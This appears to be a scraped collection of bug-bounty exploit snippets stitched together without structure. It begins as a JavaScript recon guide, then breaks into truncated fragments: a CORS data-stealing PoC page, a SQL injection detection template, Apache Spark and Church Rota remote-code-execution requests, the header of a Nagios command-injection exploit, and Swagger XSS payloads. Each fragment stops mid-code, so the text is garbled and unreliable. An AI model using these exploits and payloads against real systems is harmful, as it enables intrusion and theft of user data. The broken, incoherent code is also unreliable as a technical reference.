This is a simple guide to performing JavaScript recon in bug bounty work.
- The first step is to collect as many JavaScript files as possible (more files = more paths and parameters -> more vulns)
<html>
<body>
<button type='button' onclick='cors()'>CORS</button>
<p id='demo'></p>
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      var a = this.responseText; // Sensitive data from niche.co about user account
id: SQLInjection_ERROR
info:
  name: SQLINJECTION Detection
  author: 0x240x23elu & OFJAAAH
  severity: High
requests:
  - method: GET
Apache Spark RCE
POST /v1/submissions/create HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 619
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{
#!/usr/bin/env python
intro = """\033[94m
Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565)
nagios_cmd_injection.py ver. 1.0
Discovered & Coded by:
Dawid Golunski
https://legalhackers.com
\033[0m"""
{
  "swagger": "2.0",
  "info": {
    "title": "Swagger Test Poc XSS",
    "description": "Please to click Terms of service",
    "termsOfService": "javasript:alert(document.domain)",
    "version": "1.0.1"
  },
  "basePath": "/v1",
  "schemes": [
swagger: '2.0'
info:
  title: Swagger Test
  description: <img src=x onerror=\"alert(document.domain)\">
  default: <script>console.log('000000000000000000dad0000000000000000000');</script>
  license:
    name: BSD
    url: <img src=x onerror=\"alert(document.domain)\">
  version: '30'
produces:
Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file.
POST /resources.php?action=newsent HTTP/1.1
Host: 192.168.43.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36504512417128952451539028145
Content-Length: 526"><script>alert(/XSS/)</script>